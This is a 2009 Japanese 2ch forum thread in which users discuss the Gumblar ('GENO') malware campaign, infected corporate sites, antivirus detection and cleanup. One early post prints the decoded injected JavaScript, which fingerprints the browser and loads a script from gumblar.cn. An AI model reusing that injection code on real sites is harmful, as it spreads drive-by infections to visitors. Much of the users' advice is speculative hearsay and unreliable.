>>609 ウイルスバスターだけど、設定画面みても分からんなw
ひょっとしてできないのかしら・・・
>あさがやドラム 解読してみた。 (function(xHRY){var Yh7='var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent; if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A"; eval("if(window." a ")j=j "+a "Major" b a "Minor" b+a "Build" b "j;"); document.write("<script src=//gumblar.cn/rss/?id="+j "><\/script>");}';var x6Z=Yh7.replace(xHRY,'%');eval(unescape(x6Z))})(/_/g); 真っ黒でつ。
ドクオが混じってるかと思ったら別もんか ("A")
/gumblar.cn・・・
でもこれで感染したサイトへの電凸が容易になったんじゃない? 「小林製薬のサイトを見てください、それと同じウイルスに感染していますよ」って説明できるし (誰もが知っている)大手のサイトだから信用もしてもらいやすくなったはず
>>617 こっちは泣いてるおにゃのこっぽいな> (/_/g);
メガネメガネ ("A" )))....
b "j;")
大山鳴動して鼠一匹
ポケモンのファンサイトにも感染してたけどこれはどういう事なんだ? で、メール送っても対応無し。ブログ見ると「よくわからないので土曜日に兄に対応してもらいます」 …
どういうこともなにも感染してたんだろう お兄ちゃんがわかってくれるか心配だね
弟なのか妹なのか
しかし… この脅威に世間は知らん振りか。
abuse.jpにアドレスぶち込めば、観戦か否かを判定できるんですか?
>>629 最新亜種はまず無理。
aguse.jpがどんなUAで繋ぎに行ってるのかによってはまったく検出されない。
>>601 事前にガードは出来るけど。
GDATAはページを開く前に真っ赤な画面になってアクセス拒否してくれた
aguse.jpってカスペなの?
>>631 それは、Avastが対応しているので、Avastのエンジンが検知してブロックしただけ。
他のベンダーだとすりぬけて、gumblar.cn の呼び出しまで進んじゃうよ。
aviraはどうなの?ちゃんと対応してる?
sqlsodbc.chmのサイズが50727バイトならとりあえず感染はしてないってことなの?
ここでも調べられます。 tp://www.gred.jp/
>>634 gumblar.cnの新種にはまだ対応していない。
って言うか、いたちごっこだよ。
国を指定して全てブロック出来れば良いのにね。出来るのかな?日本と米国以外行かないし。
うっかりgumblar.cn開いちゃったけど、FirefoxのSafe Browsing APIでブロックされた… IEだったら死んでたな
GENOウイルスってHDも破損するんだろうか? なんかクリーンインストールかけたんだけれどネットやってるとたまに切断されるようになっちゃったんだよな…
ウイルスバスター2007のURLフィルタとフィッシングチェッカーを有効にした状態で IE6にて、あさがやドラム のURLを開くと 「危険なサイト アドレス http://gumblar.cn/rss/?id=568835」とメッセージが出た
gumblarに感染してたサイトのお詫び文が、 ノートンやバスターは検出しなかったしavastの誤検出っぽいけど、 avastユーザからの指摘がウザイので一応アップし直します のように書いてあってなんだか悔しくなった 感染してもはっきり分からないから世間の感覚はこんなもんか
初心なことかもしれないけど * 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断 を制限するさいtcpとudpどっちなの?
アップし直すだけじゃ無駄なのにな
>>643 これ、次スレのテンプレに入れた方が良いんじゃね?
648 :
642 :2009/05/15(金) 01:45:41
>>644 ウイルスバスターでもブロックはできているみたいだ
649 :
644 :2009/05/15(金) 01:48:40
>>648 おそらく管理人がスキャンしたのはバスターが対応する以前と思われ
サイトが何日も感染した状態で放置されてたから
>>645 TCPでしょう
いま、gumblar.cnでは94.229.65.172ですね
651 :
642 :2009/05/15(金) 01:53:32
>>649 ウイルスバスター2007の標準設定では反応なかったけれど
フィッシングチェッカーを有効にしたらメッセージがでるようになったよ
久しぶりに踏んでみたがリファラをチェックするようになったんだな リファラ切ってるとpdfもswfも読み込まれない
すっげーやばそうなウイルスなのに あまり騒がれていないのは気のせいなの?
>>644 パスワードを変えなきゃ再度改竄されるよ、と言ってあげないと…。
>>641 運が悪いと壊れるかもしれないけど切断とHDD関係なくね?
パスワード変えても無駄
管理者のPCのOSをクリーンインスコして、パスワードを変える。
バスターはフィルタリング機能があるから URLブラックリストに登録されれば遮断してくれるということか
>>655 気のせいじゃないよ。もっと話題になっても良いと思う。
亜種がどんどん出るらしいし、それら全てに対応できるセキュリティソフトはおそらくない。
クリーンイストールしか解決策が無い。
やばいですね・・・
GENOは結局どこからこのウイルス持ってきたんだろ。
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
>>662 動画サイトとかFlash多様してるサイトなんかスクリプト許可しなきゃ見れないし
よく見るサイトが感染してたら知らないうちに被害受けるしな
注意してても危ないのに普通のやつなんかもう死んだも同然だろ
>※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
俺は考えるのをやめた
>>666 だよね。
いつも見てるサイトが感染したらと思うとおそろしいわ・・・
GENOウィルスの怖いところはサーバ側で攻撃方法を自由に変えられるところなんだよな ・JavaScriptオフ GENOの例を見る限り改竄はリモートから行われている。 今はJSを介しているがある日突然ダイレクトにembedタグ、objectタグを挿入される可能性がある。 この場合JSオフでの対応は不可能。 ・Adobe Reader、Flash Playerを最新版にする、代替プラグインを使う 攻撃コードを入れ替えることができるので他のプラグイン、アプリの脆弱性を狙うことも可能。 最悪の場合ゼロデイを狙われる可能性もある。 ・IE以外のブラウザを使う Adobe関連の脆弱性はブラウザに依存しない。 ・IPまたはドメインでブロック 攻撃コードを更新していくらでも別のサーバに振り向けることが可能。 ・アンチウィルスでの対応 攻撃ファイルの更新が早く定義ファイルでの対応が追いついてない。
>>666 readerもflashも最新版になってれば被害は防げるそうだけど
flashの方はウェブサイト側で警告出せるみたい(ニコ動は警告出してたような)
readerの方はアップデートしない人多いだろうなあ
GENOにかかるとネットに繋がる時間が長くなるってほんと? Googleに全然つながらないんだが
Flash Playerを無効にしたらどう? IEだと切り替え大変だけれど
ネットのインフルエンザはパンデミックだな てか無自覚で感染してるPC多いんじゃないか?
何か感染したと思ったんだけど いろんなチェックしてたらIE落ちなくなったわ でもゲームが反応無しになる、なんだこれ
はんぱねえ
何でGENOってウイルス作ってばら撒いてるのに情報通信規制法で逮捕されないの?
680 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 02:58:19
WinMeなんですが、GENOウイルスに感染する危険はありますか? XPはヤバイと聞きますが・・・
Meの情報ないね どうなの?
これが後に語り継がれるMe最強伝説の始まりである。
親父が頑なにjavaオンのIEを使いたがる 切り替えが楽なプニルや火狐も入れといて説明したのに
>>672 ジャバスクいつも切っていて火狐でネトサフしていたら感染サイトを踏んでしまった
AVAST先生がいかり出したので接続きってブラウザ閉じたらウィルスをチェストに
隔離した方がいいとかいう画面が出てそのまま隔離
チェストをのぞいたら該当サイトのキャッシュが固まっていた
AVASTのスキャンとニフティスキャンをしたら感染0だったがブートスキャンも
しといたほうがいいかな?
JavaScriptオフでも感染!?
686 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 03:12:06
>>684 俺、avastでチェストに隔離できなかったんだけど大丈夫かな?
豚どころじゃねえぞ おい
これ対策でAdobe Readerを9に入れ替えたけど、 実は6.0.6を使ってた方が安全だったりする?w
オフにして感染されちゃどうしようもないなぁ
>>684 JavaScriptオフで反応したんであれば、
avastが感染したページに挿入されたコードに反応したのかもしれない。
そうするとブラウザ自体はgumblarのスクリプトを実行してないので、感染はしていない。
いずれにせよ感染ページにどういうコードが仕込まれていたかによる。
JavaScriptが挿入されていたのなら問題はないはず。
はやい話でIEが狙われているのですか?
>>686 他で踏んだ時は警告音と右下に二つほどなんか説明でてすぐ消えた
この時は遮断クリックしたらおkで終わった
今日のは右下に三つくらい説明が出てクリックしたらおkが出て
クリックした後にブラウザ閉じたらチェスト行き画面が出た
因みにフラッシュは最新版だがリーダーは7
でもリーダー嫌いなのでリーダーの設定を起動する時はお伺いを
しろにしてあるので勝手に起動はしていない
>>691 はやい話でそういうこと
しかしこいつのハンパねえところは
IE以外でもヤられる可能性がないわけではないというところだ
694 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 03:32:29
>>692 俺も警告音がなって、下に黄色い横長の警告文字が出てきて
すぐにIEを閉じたんだよ
で、その後に、「トロイの木馬」が検出されたってavastのウィンドウが出てきて
「チェストに移動」ってクリックしたのに、エラーになって移動できなかったんだよね
んで、すぐにTemporaryInternetFileの中身を削除して、avastで全ドライブをチェックしたんだけど、
何もウイルスとか出てこなかった・・・
これって、最初の警告音が出てavastが反応した時に、ウイルスサイトにアクセスする前に
防いでくれて、感染しなくて済んだって解釈でいいのかな?
チェストに移動できなかったのは、すぐにブラウザを閉じたから?
感染サイトにアクセスしてしまったよ Avastがブロックしてくれたよ ママン… いったいこのウイルスは どのくらいの規模なのですか?
696 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 03:33:19
>>690 怖くてソース覗きに行く勇気ありませんw
二回ともジャバスクきった状態で警告された
隔離されているやつの名前はCACHE--002
ファイル名はあてにならないかもしれないがexeじゃなくてCACHEだった
さっき知って飛んできました みごとに感染してました オワタ
感染したらどうすればいいですか?
700 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 03:38:22
感染しているか、していないか確認する方法ってありますかね?
>>699 ご愁傷さま
PCのOSクリーンインスコ入れ替えれ
>>697 ソース見れればいろいろわかるんだが…
恐らく挿入されたJavaScriptに反応してるだけだと思うんで大丈夫だと思うけども
まあ気になるならクリーンインストールお勧め
Avastが活躍する話が多いな Aviraから乗り換えようか悩む
スレを見返したり、まとめ見たり、ググったりすればすぐわかることだと思うけど、 クリーンインストール以外の解決策は今のところないよ
あの今日一日で3つも感染しているホームページを開いてしまいました TVはインフルエンザよりもこっちを報道するべきじゃないですか
708 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 03:50:16
>>701 Meの場合は、どのファイルを見ればいいですか?
Meまだ使ってる人多いのかな? 感染報告ないよね。気になるなぁ
Me使っているくらいなら 感染していても無自覚なんじゃないか?
firefoxの話題が多いようだからさっきfirefox導入して ieのお気に入りをfirefoxにインポートしたんだけど そのあとspybotで検査してたらfirefoxに入っていたお気に入り全部がspybotに引っかかったんだけど800個ぐらい 一応元がfirefoxのお気に入りからという事がわかってるからあんまり気にしてないんだけど 今回の件と関係あるかな?
>>711 上に出ていた方法で調べました
どうしよう orz
>>712 spybotスレに似たような報告があったと思うが
誤検出っぽいよ
とりあえず、ウィルスの作者を見つけ出して逮捕してくれ。 以前もこんな感じのことがあったよな。 その時は犯人が逮捕されたけれど。 勿論、外国で外国人が逮捕されたわけだがな。 被害が世界中に及ぶから性質が悪い。
>>591 >本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布:ITpro
>tp://itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/
の
>このプログラムをウイルスだと判定したのは14製品だけだった
この14製品を書かないと記事として片手落ちだろう。つーか知りたい。
多分ノートン先生は失格だろうなあ。
ここまで危険なウイルスっていままでにあった? 知り合いが感染していたよ。 まじやばい。
ニフティのオンラインスキャンしたけど感染してなくてほっとした。 バスター2009いれてて、URLフィルタもフィッシングブロックも有効にしてるけど XPだから油断できないな… firefoxでも危険なんだよなコレ? うかつにネサフできねーじゃん…
>>714 ええ、そうなの?
実は2回に分けて検出されたんだよね
1回目は500個ぐらいで
2回目は300個ぐらい
そんで全部修正して3回目には見つからなくなったけど
何それじゃspybotがfirefoxのお気に入りを誤検出してたということか
thx
感染したかどうかがわからんが ニコニコみてたら(クリックした時)IEがよく固まるな。 つーか、発見から3ヶ月くらいたってない? いまだ解決策はおろか、判別法も無しかよw
sqlsodbc.chmはとりあえず改ざんされてない場合の場所に ファイル名実行できた AVASTがキャッシュ隔離したしカスペとスパイボットとAVAST スキャンで感染0だったからもう寝るヽ(`Д´)ノ
>>610 気象庁のレーダーとかアメダスとかな。
Operaとかだとサイト毎に設定できるんだが
今回のは気象庁のサイトだって汚染される可能性もあるしいやはや・・
発見から3ヶ月もたってるのか?これ。 さっきブログではじめて知ったよ。 どこかで報道されていないの?
>>720 genoで見つかったのが4月最初くらいじゃなかったか?だから1ヵ月半くらいだと思う
genoより前から話題になってたらわからんけど
システムの復元は無意味?
>>725 クリンインスコをおすすめ
システムそのものを書き換えます
>>725 感染したんならクリーンインストール以外は意味ないよ
4月に楽天のスレでGENO感染楽天店舗対応最悪で プチ祭があったけど我が身に這い寄ってくるとは おもなんだナイアルラトホテプ
>>727 はっきりと感染ってどうやったら判明するのか
明確な基準ないよな
>>724 1ヶ月半なら、もっとニュースになっていてもいいよね?
検索してみても個人のページしか出てこないや
731 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 04:15:54
感染したら、クリーンインストールするしかない って言うけどさ、そもそも感染しているのかどうか判別できないんだけど? 感染の有無を判定する方法って何か無いの?
GENOウイルス大活躍だな、なんでこんなにすごいんだ?
>>731 過去スレ、ちゃんと見たか?
完璧な判定方法がないからやべえんだよ、こいつは。
735 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 04:17:36
とりあえず、avastでチェックかけたら大丈夫だった あと、ニフティのオンラインスキャンで大丈夫なら感染してないって判断で良いのかな?
現状だと、セキュリティーソフト入れていても、次々と新種が出てきて対応できない 感じ? どこのサイトで感染するか分からないという恐ろしい事態だな (((( ;゚Д゚)))ガクガクブルブル
>>736 その通り
こいつは狙いやすい環境(IE)をチェックして感染しているのがたちが悪い
>>736 んな感じ
とりあえず既にいろいろ言われてる対策はしておいたほうがいいとはおもう
>>737 そこはむしろ見ておいたほうが良いと思う。
心配ならまとめページのトップからもリンク張られてるし確認するといい
Adobe Readerってアンインストールしてもいいんですか?
>>740 使わないんならいいんじゃね?
不便だけどさw
>>741 このウィルス知ってから何もかも恐る恐るって感じなんですよ・・・
とりあえず滅多に使わないんで消しときました
レスありがとうございます
ウイルスバスター終わったので寝ます orz 明日みんなに連絡しなくちゃ… みなさんもお気を付けて
>>717 7年ぐらい前かNimdaの騒ぎは凄かったな。
NHKの7時のニュースでもトップ扱いだったかな。
745 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 04:30:27
てかニフティで検索するのに ニフティ感染してるの????
746 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 04:31:09
>>737 もう一体何が起こってるのかさっぱりなんだが・・・
大塚製薬とSayMoveのほかにNTTまで感染してんの??
748 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 04:34:45
>>746 前のレスにも出てるけど
http://www3.atword.jp/gnome/ のサイトにかいてある
SAKURAインターネットさん
www1722.sakura.ne.jp
sv172.lolipop.jp
sv11.chicappa.jp
株式会社 PURENIC JAPAN さん
p09ns7.puretopure.jp
NTTコミュニケーションズさん
120.29.185.234(VPS-TOKYO2)
ニフティサーブ ネットワーク(ニフティ株式会社さん
61.121.100.119
の該当データの停止を行ってください。
何度Mail送っても反応無いので・・・・・
>>745 マジかよ
さっきオンラインスキャンやってきたばっかだぞorz
早く寝てしまいたい…
750 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 04:38:08
ニフティにアクセスしたらアウトなの?
ニフティのセキュリティ情報サイトさっき見たばかりなんd
マジでヤバイなこれw
ニフティ今朝アクセスしたばっかり・・・。うwぁああああああああああああああ
けどコマンドプロンプトもレジストリエディタも普通に立ち上がったぞ IEの挙動もなんともない CPU使用率もいたって普通
>>196 これって何をスキャンしたの?
ローカルに保存したファイルしかスキャンできないと思っていたんだけど、違うのか?
一気に感染拡大してるじゃん。しばらく安心してネット出来ないなこりゃ
ニフティマジかよスキャンするためにわざわざIEでJS有効にしたのに・・・
専ブラで2ch見るぶんには大丈夫だよね?
avast反応よさそうなのでインスコしたらBeckyでメール受信出来なくなった アンインスコした
760 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 04:45:23
>>754 IEの挙動は元々おかしい(WinMeなので・・・)んだけど、
MS−DOSプロンプトとレジストリエディタは立ち上がった
一応、感染してないってことで良いのかな?
761 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 04:45:38
これて桜とかニフティでサーバーかりてる一部の感染じゃないの?
762 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 04:48:06
>>754 CPU使用率は元から100%な件・・・
ニフティなんてスキャンするために何度も行ってるが
もう疑心暗鬼になってるなw よくあるパターンだw
怖くて再起動/シャットダウンできないwww 寝たいよー
ウインドウズアップデートしたら重すぎて怖い
どうせサイトなんか持ってないし、挙動もおかしくないし、 (感染してるかどうかわかんないけど)騒動落ち着いてからOS入れなおそうかなw 何かもうアホらしくなってきたw
www.nifty.comとはIPアドレスが違うから落ち着け
あやしいURLを開こうとしたらウィルス対策ソフトって警告とか出ますかね
771 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 05:00:27
>>765 俺もシャットダウン&再起動できんわw
シャットダウンしたら最後、起動できなくなりそうでw
バックアップも取ってないし、終わったわ・・・
アダルトサイト見ていたわけでもないのに、何でウイルスに出くわすんだよ
772 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 05:01:47
>>770 俺はavastでページ開く前に警告出たんだけど、何故かウイルスチェストに移動できなくて
果たして感染防止できたのか、感染してしまったのか判断できずに困ってる・・・
774 :
765 :2009/05/15(金) 05:03:09
よっしゃ、勇気を出して(ヤケクソで)再起動したけど
またここに戻ってこれたよおおおおおお
>>769 ありがとねw
>>772 まずはすぐに確認できるもの(regeditとか)だけ確認してみれば?
>>771 案外アダルトサイトの方がウイルス対策や改竄対策をしっかりやっていて却って安心だったりして。
これって感染したらすぐわかるもんなの?コマンドプロンプトやレジストリエディタなんて、普段はあんまり使わないし 特定のサイトに繋がらない、ブラウザが落ちるっていうのも何も知らない人だったら「ちょっと調子悪いなぁ」くらいにしか思わないんじゃ・・・。
これだけ広まってれば大々的な対策されるのも時間の問題だよな、流石に そうであってほしい
779 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 05:06:45
>>773 Meのせいか、普段から挙動がおかしいので分からんw
>>775 とりあえず、MS−DOSプロンプトとregeditは起動できた
大丈夫なのかな?
>>776 それは言えてるw
意外とアダルトサイトってウイルスいないよねw
>>760 Meってとっくにセキュリティー関連の更新が終わっているんじゃないの?
脆弱性の検査もされずに放置され、トロイとかの餌食になってると思うけど。
持っていないから、詳しくは知らんけど。
Meは今んとこ感染報告ないからのう…
782 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 05:09:01
>>780 2,3年前にサービス停止したね
でも、俺のPCはMeがOSなので、仕方が無く使ってるわ・・・
一応、Meでもavast入れていれば大丈夫だよね?
今回も警告出てくれたし
GENOはどこからウィルスもらってきたわけ
>>782 いや例えこのウイルスはブロックできてもそれ以外で問題山積みだから
窓から投げ捨てて安物のネットブックでも買って来い
785 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 05:12:17
>>784 今日、電気屋に行って、PC物色して来たよ
OS(XP)がインストール済みのノートで5万5千くらいだったな
Meは古すぎる、つまりネット絡みが貧弱なので 落とされる脆弱性はあっても乗っ取られる要素は2000よりも少ないと何かで読んだことがある。 98SEからXPに移行したクチなのでMeは良く分からないな。
安いPCを探そうと思ったけど通販サイトや情報サイト覗くのが怖い件w
Windowsが狙われたとは言えmacを使う気になれないのはどうしてだろう。
このウィルスの話題って外じゃ全然でてこないけど かなりやばくないか
2ch内でもそこまで騒ぎになってないよな 苺きんたまの時とかの方がみんな騒いでた セキュリティソフトを過信して安心しきってるってことかな
>>790 大きい企業もやられているので圧力が・・・
個人情報も抜かれてるなんて知られた日には初心者はパニックになるよな。
4月の半ばになんかのサイト見ようとリンク押したら警告でたなぁ もしかしたらこのウィルスかもしれん
アドビのサイト開こうとするとブラウザが固まる FireFoxならいけたんだけど何でだ
小林製薬のサイトよく見てたから怖くなってきた…
61.121.100.119って hXXp://homepage.nifty.com/ のサーバーのIPアドレスか?
なるほどwww.nifty.com行っても反応ないのか
見に行ったら表示されないなあ
799 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 07:08:42
再起動したけど、とりあえず普通に立ち上がったわ CPU使用率も問題ないし、regeditも起動できた 感染してないってことでOK?
Nimdaは感染経路がいくつもあったからある意味「責任逃れ」ができたんだけど、 GENOウイルスはサイト管理者のPCが感染→そこからFTPを通してサイトが改ざん→ そのサイトにアクセスすることで感染、と経路(つまり責任)がはっきりしているから 「お前のせいで感染したんだ!どうしてくれる!」「怖いからもうそこでは買わない、 それどころかそのサイトに行きたくもない」と企業や個人の責任問題にされかねない
aguse.jpが全然役に立たない理由が↓見てわかったわ。
http://ilion.blog47.fc2.com/blog-entry-128.html jscript.dllのバージョンを調べて、本当にIEで表示してるのかを確認してるから、
UAを偽装してアクセスしても検出されないんだ。
スクリプトの難読化パターンも多いし、シグネチャベースの検知はかなり難しいね。
オンラインスキャンもほとんど無意味だし、avast入れておくのがいちばんかも。
とりあえずIEを使わないってだけでも、現時点では効果があるけど、改変版でも
大丈夫かどうかわからないし。
ノートン無反応か・・・早く対応すればいいのに
803 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 07:58:08
>同社のホームページが何者かによって改ざんされ
aguseは、GENO祭りの真っ最中もまったく役立たずだったな。 何度調べさせてもセフセフ。
GDATA(avast)は対応済みか、、、後常にJSを切ってる人
↑見たらJSあっても無くても感染するのか。
808 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 08:14:06
フラッシュプレイヨー10って小数点以下の違いある? アドビリーダー9.10と9.11みたいな違い。
違いがないのに数だけ増やしてると思ってるの?
>>805 zlkonやgumblarがアクセス制御かけて同じホストからの接続には
しばらく(?)無害になるのでサーバーサイドのチェッカの類はほぼ効かない
(初回は有害判定されるかもしれんけど、たぶんJScript.dllチェックで蹴られておしまい)。
NortonSafeWebもセーフ判定のまま。
>>803 確認して感染が見つかったらどう責任とってくれるんだよwww
>>803 >同社のホームページが何者かによって改ざんされ
w
GENOにくらべたら対応がいいほう
アンチウィルスのパターンファイルもアテにならないし、ヒューリスティック頼みだな。 そのヒューリスティックもAvast!以外は無力みたいだし、Avast!も亜種すべてに 反応するかわからんし、困ったもんだな。 JavaScriptの埋め込みによるリダイレクトじゃなくて、hrefタグを書き換えるような 形になってしまったらAvast!も反応しないんじゃないかな?
815 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 08:30:57
>>809 そうじゃなくて10にも種類があるのか知りたい。
前に10にしたけど知らない間に新しいの出てると困る。
>>815 FLASH バージョン でググって最新版か確認汁
>>815 Acrobat ReaderなりAcrobatなりを立ち上げて、ヘルプメニューの「アップデートの有無をチェック」
してみればいいよ。インストールされているAdobe製品全般のアップデート確認が行われるから。
>>817 それ、なぜかFlashは対象になってない気がする。Reader、Acrobat、PhotoShop等は
アップデートされるんだけどね。
まぁFlashPlayerはそれ単体で起動するものではなくブラウザから呼ばれる物だからね。 IEならFlash置いてあるサイト管理者がobjectタグにバージョン書いとけばそれ以下ならIEに更新を促される。
823 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 08:43:12
824 :
822 :2009/05/15(金) 08:43:37
825 :
822 :2009/05/15(金) 08:44:18
orz (^^;
826 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 08:46:12
有料のノートンとかバスターより無料のavastが凄いとか、どういうことよ?
JAVAスクリプトのソースに、ノートンのオートプロテクトは反応しないのか
>>823 Genoに関してはね。
過剰に反応することも多いし、FWやアンチスパイウェアとも組み合わせなければ
いけないから、PCにあまり詳しくない人には勧めにくいんだよな。
家族が使ってるPCのセキュリティソフト、どうすっかな。
バスターは元々無料のより使えないけどな
>>827 しないね。難読化パターンがいろいろあるし。
このウイルスの怖さを周りや上司にいっても 「ふーん」で終わって、ちゃんとupdateの確認さえしたかも怪しい。。 これが普通なのかな、ちゃんと説明した自分が空しい。。
832 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 09:00:41
>>828 俺、avast単独で使ってるんだけどダメなのか?
俺のところも、前回のラトビアの規制だけして、adobeのバージョンアップはなし。 業務に影響を及ぼしうるadobeのバージョンアップは許可できないんだそうでw 業務用バスターw入れてるから大丈夫とか、もうアボガドバナナと。
>>832 FWはルータの内側で使ってるならなくてもいいかもね。
Avast!単体だとマルウェアやスパイウェアの類はスルーされる可能性があるから
入れておいた方がいいと思う。
Avast+UAC+WindowsFWが手軽でわりと安全
837 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 09:16:44
>>835 ルータ(ホームゲートウェイ)の内側で使用してるわ
FW(ファイアウォール)って、ルータとかで外部のインターネットと
隔絶されている環境(LANとか)ならもう入っているんでしょ?
>>837 ルータにはポート、プロトコルベースのFW機能はあるけど、自分で設定しなければ
ザルだよ。標準状態ではTeredoが通過しちゃうものも多いし。
本物のウィルスより怖いわ バックアップとっておくかな
IDがでないから、誰が何を書いているのか分からんな。
>>837 使っているOSは?
ルーターが仮に100パーセント外部からの攻撃は防げたとしても、
内側からのリクエストはスルーするからね。
ブラウザでリンク先をクリックすれば、
ルータに遮断されずに次のページの(外部)情報がローカルに戻ってくるのと同じ方法で
悪さをされないともいえない。
PCに入ったマルウェアが外部に情報を送ったりってのを防げる確立が減る。
FW入れてても、IEとかに偽装されて通信されるんだから、入れたほうが良いよ。
フリー HIPS Firewall OR ファイアーウォール
でググルんだ。
841 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 09:40:50
>>840 OSはWinMe
FWってルーターの内側でも別個に入れておかないとダメなもんなの?
俺はavast入れておいたから、もう大丈夫だと思ってたよ
セキュリティソフトってファイアウォールの役割もあるんじゃないの?
Meなんか捨てろ
843 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 09:56:02
>>842 2004年に中古PCを買ったとき、プリインストールされていたんだよ
まだ5年しか使ってないんだぞ?ネットゲームとかしない限りは、普通に
ブラウザでHPも閲覧できるし・・・特に問題はないんだが
たった、5年で捨てるとか、買い換えるとか、車とかTV,冷蔵庫じゃありえん
844 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 09:57:16
知り合いは言っても無駄だから全部人柱、観察対象でオケ。
845 :
613 :2009/05/15(金) 09:57:37
846 :
840 :2009/05/15(金) 09:57:41
>>841 >FWってルーターの内側でも別個に入れておかないとダメなもんなの?
だから、入れておかないとダメって言ってるじゃん。
>>779 と同じ人?
はっきり言って、君のような人がボットネットやマルウェア拡散の踏み台になっているんだよ。
>>779-788 は読んだ?
avastはFW入ってないでしょ?
ウィルス対策とファイアーウォールは別。
ノートンとかウィルスバスターはFWも統合されているけど、ウィルス対策だけを抜き出している製品もある。
avastは抜き出された方と同種であり、セキュリティーの一部を担っているだけ。
ルーターも初期設定で使ってそうだな。 ルーターだと思っていたが、実はモデムだったってオチすらありそうだ。
何か色々あったが3日で直った、多分このウイルスの現象 1、とりあえずIEが満足に使用できなくなる IEの再インストール?上書き?でとりあえず直る 2、公式ログイン制のオンラインゲームが起動しなくなる どうやらパスワードの認識が通らなくなる様子、何故通らなくなるのかは知らん avastのアップデートが出来なかったり、エアーステーションに接続できなくなったり等 3、cmdが使えなくなる、色々方法を探してたときに気づいた 結局cmdは使ってないけどな、復元ポイント早速作っておいたわ とりあえずスパイウェア削除してavast起動したらシステムメモリ内にウイルス混入してたっぽく 再起動後にスキャンするとか言うのをやったら直ったっぽい
848 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 10:03:37
>>846 ルーターであることは確かだよ
光回線だし、モデムだけじゃなくてホームゲートウェイで
インターネットに接続しているから
ただ、初期設定の状態で使っていることは確かだな
ルーターの設定を勝手に弄って、変な設定に変えたらまずいし
とりあえず、もう少ししたらXPのインストールされたPCに買い換えようと考えている
>>847 何でその時点の復元ポイント作るんだよwww
悪いことは言わんからOS再インストールしてメール等、思いつくもののパスワード全部変更しとけ。
851 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 10:05:47
そうそう、何かの雑誌で「セキュリティソフトは1個だけインストールするのが基本で 複数のソフトを入れると競合が起きてまずい」って書いてあったんだよ だから、俺はavast一本にして、他のFWとかも一切入れなかったんだ
avastはFW入ってないから競合しようがないと思うが、することあるん?
853 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 10:22:19
FWもセキュリティソフトの一種だから、競合起こしたらまずいと思っていたんだが・・・
>>851 それはノートンとかの話でしょ?
それにお前はavastにFWが搭載されていると思っていたんだろうが。
>>849 一刻を争う時に半年後の話をしてどうする。
>>852 対策されてるかわからんが、一昔前はある事もあったよ。
FW単体のほかにウイルススキャンのソフトもやってる会社だったから、他社製品に対して意図的に競合起こしてんじゃねえの?
って言われたりしてた。
もう1回ニフ見てくるか
>>843 中古で買った日から起算して5年とかバカなの?
MEはその名のとおり2000年、前世紀(20世紀)の遺物で
2004年当時はXPに対してSP2が出ている。
おまけに10年前だろうと去年だろうと車やVTや冷蔵庫の性能は大して変わらんが
PCの能力やそれを取り巻く環境(ネット等のインフラ、その利便性と脅威)は
大幅に変わるんだよ。XPSP2もBlasterやSasserの猛威があって
日本中の郵便局でCDを配っただろ。
MEは現時点であらゆるサポートが切られている。
XP使ってるんだがカスペオンスキャンで感染見つからなければセーフ?
Meが何の略かとかさっぱり忘れてたぜ
つーかよく9x系未だ使ってられるよな。 システムリソース気にしながら作業なんて もう考えたくねえ
>>854 >
>>849 > 一刻を争う時に半年後の話をしてどうする。
だってこれからXP買おうとしてる人にVISTA勧めるのもなぁ
ニフもGENOも問題なくなってるのか 馬は警報きた
